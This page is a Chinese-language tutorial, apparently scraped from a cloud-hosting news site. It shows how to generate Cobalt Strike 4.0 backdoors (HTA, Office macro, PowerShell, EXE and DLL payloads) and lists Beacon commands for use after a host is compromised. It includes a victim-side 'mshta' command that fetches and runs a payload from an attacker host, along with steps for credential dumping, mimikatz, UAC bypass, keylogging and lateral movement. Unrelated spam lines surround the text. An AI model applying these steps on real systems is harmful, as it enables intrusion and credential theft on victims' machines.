91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

發布時間:2021-12-24 14:30:30 來源:億速云 閱讀:138 作者:柒染 欄目:網絡管理

本篇文章為大家展示了CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

步驟:Attacks—〉Packages—〉如下:

  1. HTML Application 生成惡意的HTA木馬文件

  2. MS Office Macro 生成office宏病毒文件

  3. Payload Gene rator 生成各種語言版本的payload;

  4. Windows Executable 生成可執行exe木馬;

  5. Windows Executable⑸ 生成無狀態的可執行exe木馬。
    CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

1.HTML Application

生成惡意的HTA木馬文件

  • —個HTML Application (HTML應用)是一個使用HTML和一個Internet瀏覽器支持的腳本語言編寫的Windows程序。該程序包生成一個HTML應用,該應用運行一個CobaltSt rikepayload。你可以選擇可執行的選項來獲取一個HTML應用,此HTML應用使得一個可執行文件落地在磁盤上并運行它。

選擇PowerShell選項來得到一個HTML應用

  • 該應用使用PowerShell來運行一個payload。使用VBA選項來靜默派生一個MicrosoftExcel實例并運行一個惡意的宏來將payload注入到內存中。

生成一個 HTML application

  • Attacks -> Packages -> Html Application

CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

這里有三種工作方式

CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

  • executable(生成可執行攻擊腳本)

  • powershell(生成一個powershell的腳本)

  • VBA(生成一個vba的腳本,使用mshta命令執行)

這里借鑒一個網上的方法,生成一個powershell,因為i兩外兩種方式上線不成功,然后配合host file使用。

CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

然后會生成一個URL復制到

http://x.x.x.x:8008/download/file.ext

然后在受害者機器上運行

mshta http://x.x.x.x:8008/download/file.ext

然后CS端就可以收到上線了

CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

2. MS Office Macro

該程序包生成一個MicrosoftOffice的宏文件并提供將宏嵌入Microsoft Word或Microsoft Excel的說明。這個參考我釣魚部分的宏文件制作部分的文章。

3.payload Generator

該程序包允許你以不同的多種格式導出Cobalt Strike的stager。

運行 Attacks -> packages --> payload generator

該模塊可以生成n種語言的后門Payload,包括C,C#,Python,Java,Perl,Powershell腳本,Powershell命 令,Ruby,Raw,免殺框架Veli中的shellcode等等…

CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

滲透Windows主機過程中,用的比較多的就是Powershell和Powershell Command,主要是因為其方便 易用,且可以逃避一下殺毒軟件(AV)的查殺。

以Powe rshell Command為例,生成的payload為一串命令,只要在主機上執行這一串命令(主機需安 裝Powe rshell), cs即可收到主機的beacon

CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

4.Windows Executable (Windows 可執行文件)

該程序包生成一個Windows可執行Ar tifact,用于傳送一個payload stage r。這個程序包為你提供了多種輸出選項。

Windows Serv ice EXE 是一個 Windows 可執行文件,可響應Service Cont rol Manage r命令。你可以使用這個可執行文件來作為使用sc命令起的Windows服務的調用程序,或使用Metasploit框架的PsExec模塊生成一個自定義的可執行文件。

也就是說,普通的EXE和服務器啟動調用的EXE是有區別是。利用Windows ServiceEXE生成的EXE才能用來作為服務自啟動的EXE,利用Cobalt Strike中Windows exe生成的EXE不能作為服 務自啟動的EXE程序(因為不能響應Service Control Manager)
CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

Windows DLL (32-bit)是一個 x86 的 Windows DLL。

Windows DLL (64-bit)是一個x64的Windows DLL。這個DLL會派生一個32位的進程,并且將你的監聽器遷移至其上。這兩個DLL選項都會導出一個開始功能,此功能與rundll32 .exe相兼容。使用rundll32 .exe來從命令行加載你的DLL。勾選Use x64 payload框來生成匹配x64 stager的x64Ar tifact。勾選Sign executable file框來使用一個代碼簽名的證書來簽名一個EXE或DLL Ar tifact。你 必須指定一個證書,你必須在C2拓展文件中指定證書。

上面說了好多但是實踐非常簡單,只是需要確認下受害者的電腦是X64還是X32直接運行我們生成的exe文件

CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

5.Windows Executable(s)

該程序包直接導出Beacon (也就是payload stage),這個Beacon是作者寫好的32或64位DLL,是一個不使用stager的可執行文件,直接和監聽器連接、傳輸數據和命令。一個不使用stager的payload Ar tifact被稱為無階段的Ar tifact。這個程序包也有Powe rShell選項來導出Beacon作為一個PowerShell腳本,或raw選項導出與位置無關的beacon代碼。

默認情況下,這個對話導出x86 payload stage。勾選Use x64 payload框來使用x64 Ar tifact生成一個x64 stage。勾選Sign executable file框來使用代碼簽名的證書來簽名一個EXE或DLL Artifact。

這里嘗試生成一個powershell馬

但是生成后直接運行不可行
CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么
這里要更改下他的策略

只有管理員才有權限更改這個策略。非管理員會報錯。查看腳本執行策略,可以通過:

PS E:> Get-ExecutionPolicy

更改腳本執行策略,可以通過

PS E:> Get-ExecutionPolicyRestrictedPS E:> Set-ExecutionPolicy UnRestricted

然后再次執行:

CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么
CS4.0上線機器后操作
右鍵菜單:
CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

一、Interact
進入操作命令

二、Access
CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

Dump Hashes # 獲取hash

Elevate #提權

Golden Ticket #生成黃金票據注入當前會話

Make token #憑證轉換

Run Mimikatz # 運行Mimikatz

Spawn As #用其他用戶生成Cobalt Strike偵聽器

三、Explore

CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

Browser Pivot #劫持目標瀏覽器進程

Desktop(VNC) #桌面交互

File Browser #文件瀏覽器

Net View #命令Net View

Port Scan #端口掃描

Process List #進程列表

Screenshot # 截圖

四、Pivoting

CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

SOCKS Server# 代理服務

Listener #反向端口轉發

Deploy VPN #部署VPN

五、Spawn
外部監聽器(如指派給MSF,獲取meterpreter權限)

六、Session
CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么

Note #備注

color #標注顏色

Remove #刪除

Sleep #指定被控端休眠時間,默認60秒一次回傳,讓被控端每10秒來下載一次任務。實際中頻率 不宜過快,容易被發現。(心跳時間)

Exit #退出

interact打開beacon后執行的操作:

1. argue 進程參數欺騙

2. blockdlls 阻??進程加載?Microsoft DLL

3. browserpivot 注?受害者瀏覽器進程

4. bypassuac 繞過UAC提升權限

5. cancel 取消正在進?的下載

6. cd 切換?錄

7. checkin 強制讓被控端回連?次

8. clear 清除beacon內部的任務隊列

9. connect Connect to a Beacon peer over TCP

10. covertvpn 部署Covert VPN客戶端

11. cp 復制?件

12. dcsync 從DC中提取密碼哈希

13. desktop 遠程桌?(VNC)

14. dllinject 反射DLL注?進程

15. dllload 使?LoadLibrary將DLL加載到進程中

16. download 下載?件

17. downloads 列出正在進?的?件下載

18. drives 列出?標盤符

19. elevate 使?exp

20. execute 在?標上執?程序(?輸出

21. execute-assembly 在?標上內存中執?本地.NET程序

22. exit 終?beacon會話

23. getprivs Enable system privileges on current token

24. getsystem 嘗試獲取SYSTEM權限

25. getuid 獲取?戶ID

26. hashdump 轉儲密碼哈希值

27. help 幫助

28. inject 在注?進程?成會話

29. jobkill 結束?個后臺任務

30. jobs 列出后臺任務

31. kerberos_ccache_use 從ccache?件中導?票據應?于此會話

32. kerberos_ticket_purge 清除當前會話的票據

33. kerberos_ticket_use Apply 從ticket?件中導?票據應?于此會話

34. keylogger 鍵盤記錄

35. kill 結束進程

36. link Connect to a Beacon peer over a named pipe

37. logonpasswords 使?mimikatz轉儲憑據和哈希值

38. ls 列出?件

39. make_token 創建令牌以傳遞憑據

40. mimikatz 運?mimikatz

41. mkdir 創建?個?錄

42. mode dns 使?DNS A作為通信通道(僅限DNS beacon)

43. mode dns-txt 使?DNS TXT作為通信通道(僅限D beacon)

44. mode dns6 使?DNS AAAA作為通信通道(僅限DNS beacon)

45. mode http 使?HTTP作為通信通道

46. mv 移動?件

47. net net命令

48. note 備注

49. portscan 進?端?掃描

50. powerpick 通過Unmanaged PowerShell執?命令

51. powershell 通過powershell.exe執?命令

52. powershell-import 導?powershell腳本

53. ppid Set parent PID for spawned post-ex jobs

54. ps 顯示進程列表

55. psexec Use a service to spawn a session on a host

56. psexec_psh Use PowerShell to spawn a session on a host

57. psinject 在特定進程中執?PowerShell命令

58. pth 使?Mimikatz進?傳遞哈希

59. pwd 當前?錄位置

60. reg Query the registry

61. rev2self 恢復原始令牌

62. rm 刪除?件或?件夾

63. rportfwd 端?轉發

64. run 在?標上執?程序(返回輸出)

65. runas 以其他?戶權限執?程序

66. runasadmin 在?權限下執?程序

67. runu Execute a program under another PID

68. screenshot 屏幕截圖

69. setenv 設置環境變量

70. shell 執?cmd命令

71. shinject 將shellcode注?進程

72. shspawn 啟動?個進程并將shellcode注?其中

73. sleep 設置睡眠延遲時間

74. socks 啟動SOCKS4代理

75. socks stop 停?SOCKS

76. spawn Spawn a session

77. spawnas Spawn a session as another user

78. spawnto Set executable to spawn processes into

79. spawnu Spawn a session under another PID

80. ssh 使?ssh連接遠程主機

81. ssh-key 使?密鑰連接遠程主機

82. steal_token 從進程中竊取令牌

83. timestomp 將?個?件的時間戳應?到另?個?件

84. unlink Disconnect from parent Beacon

85. upload 上傳?件

86. wdigest 使?mimikatz轉儲明?憑據

87. winrm 使?WinRM橫向滲透

88. wmi 使?WMI橫向滲透

上述內容就是CobalStrike 4.0 生成后門幾種方式及主機上線后基礎操作是什么,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

定陶县| 年辖:市辖区| 龙游县| 盘山县| 东明县| 淄博市| 汝城县| 鹿泉市| 阿图什市| 九龙坡区| 临漳县| 大竹县| 凤山市| 溆浦县| 普兰县| 淳安县| 邓州市| 曲麻莱县| 康平县| 即墨市| 遂溪县| 江安县| 鹤岗市| 南昌县| 肇源县| 锡林郭勒盟| 偃师市| 兰考县| 巴林右旗| 遂昌县| 武清区| 五家渠市| 朔州市| 板桥市| 新龙县| 连城县| 大厂| 淮北市| 延边| 色达县| 衡水市|